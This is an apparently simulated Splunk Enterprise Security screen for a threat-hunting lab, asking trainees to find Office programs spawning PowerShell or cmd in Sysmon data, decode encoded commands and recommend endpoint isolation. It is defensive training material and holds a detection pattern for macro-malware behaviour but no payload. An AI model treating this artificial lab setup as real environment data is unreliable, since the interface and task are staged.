splunk>enterprise
Administrator ▾Settings ▾
ES
Enterprise Security
Splunk App for Enterprise Security · v7.3.0
DAY 6 LAB · LAB 6 — HUNT OFFICE → POWERSHELL· week 1
Hunt Office spawning shells — Sysmon EventCode=1 macro chain.
- ›Run pre-loaded SPL: Sysmon parents winword/excel/outlook spawning powershell/cmd.
- ›Decode any -enc base64.
- ›Recommend EDR isolation.
Hint: winword.exe → powershell.exe with -enc is textbook macro malware.
New Search
supported: search field=value (wildcards) · stats count by f1,f2 · where field op N · sort -field · top N field · head N · table f1 f2